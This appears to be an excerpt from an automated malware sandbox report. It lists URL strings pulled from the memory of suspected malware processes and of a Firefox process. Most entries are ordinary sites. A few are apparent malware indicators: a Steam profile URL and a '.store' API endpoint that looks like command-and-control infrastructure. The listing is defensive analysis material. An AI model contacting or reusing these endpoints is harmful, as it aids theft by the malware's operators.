Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: f84005b97f.exe, 00000007.00000003.2823560713.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.co
Source: f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com
Source: f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/(Z
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: f84005b97f.exe, 00000009.00000002.2949821023.0000000000F26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: f84005b97f.exe, 00000007.00000003.2823560713.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: f84005b97f.exe, 00000007.00000003.2813057343.0000000001437000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: f84005b97f.exe, 00000009.00000002.2949746243.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: f84005b97f.exe, 00000009.00000002.2949821023.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba2
Source: f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: f84005b97f.exe, 00000007.00000003.2823560713.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000002.2826347227.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2944904365.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2947007476.0000000000F82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: f84005b97f.exe, 00000009.00000002.2949746243.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/api
Source: firefox.exe, 00000017.00000002.3094636474.000002882138F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3117080621.000002882433B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3090755070.000002881F703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000017.00000002.3134981536.000002882601C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3108949282.0000028823403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3053217524.000002882601C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000017.00000002.3097162174.0000028822B6A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089829933.000002881F2C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3142479922.000002882B153000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3149714295.000002882B61F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000017.00000002.3179092949.000002882E21F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helphttps://support.mozi
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 00000017.00000002.3128736954.0000028825EC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsstartMigration
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationtranslations-panel-error-load-languages-hint-butto
Source: firefox.exe, 00000017.00000002.3179092949.000002882E21F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3125275736.0000028825A86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3125275736.0000028825A96000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3125000462.00000288256C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3125275736.0000028825A86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3125275736.0000028825A96000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3125000462.00000288256C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3125275736.0000028825A86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3125275736.0000028825A96000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3125000462.00000288256C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000017.00000002.3093750856.0000028820AF0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3125275736.0000028825A86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3125275736.0000028825A96000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3125000462.00000288256C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000017.00000002.3108949282.0000028823403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3090755070.000002881F703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.combrowser.migration.versiontestPermissionFromPrincipalbrowser.urlbar.sug
Source: firefox.exe, 00000017.00000002.3180688170.000022DAD3C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3179092949.000002882E20B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3180311343.000012316BF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3157463528.000002882B83C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3050822463.000002882E0B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3142479922.000002882B108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000017.00000002.3143683785.000002882B2A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3179092949.000002882E20B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3180311343.000012316BF00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3173331545.000002882DF05000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3118828898.000002882445D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3175463259.000002882E047000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3050822463.000002882E0B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3055688840.000002882E047000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3052847397.000002882E04D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: 7e96f85771.exe, 00000008.00000002.3201117292.00000000299D1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000017.00000003.2983132390.000002882376F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3117080621.0000028824396000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982268821.0000028823500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825165000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982443745.000002882371D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3112181338.0000028823900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.2982699498.0000028823738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982871988.0000028823753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2983357091.000002882378A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F825000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F87B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3044553062.000002882BA78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000017.00000003.3044201418.000002882BAB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BAB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3090755070.000002881F703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3181086426.00002AB6B1200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: 7e96f85771.exe, 00000008.00000002.3201117292.00000000299D1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822BBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3097162174.0000028822B4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: f84005b97f.exe, 00000007.00000002.2826107059.0000000001481000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2823586577.0000000001481000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.
Source: f84005b97f.exe, 00000007.00000003.2812942208.0000000001481000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000007.00000003.2812900969.00000000014C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: f84005b97f.exe, 00000007.00000003.2812942208.0000000001481000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/a.
Source: f84005b97f.exe, 00000007.00000003.2812900969.00000000014C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: firefox.exe, 00000017.00000002.3091500089.000002881F8DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3126440245.0000028825CC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: firefox.exe, 00000017.00000002.3134981536.000002882601C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3182405110.000037AF92204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3053217524.000002882601C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3163888580.000002882BA30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000017.00000003.3034678162.000002882B735000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3123219764.0000028825119000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3032497653.000002882B387000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.3044553062.000002882BA78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000017.00000003.2983132390.000002882376F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982268821.0000028823500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3157463528.000002882B810000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982443745.000002882371D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3112181338.0000028823900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.2982699498.0000028823738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2982871988.0000028823753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2983357091.000002882378A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3091500089.000002881F87B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: f84005b97f.exe, 00000009.00000003.2945007725.0000000000F39000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000003.2945007725.0000000000F49000.00000004.00000020.00020000.00000000.sdmp, f84005b97f.exe, 00000009.00000002.2949821023.0000000000F49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
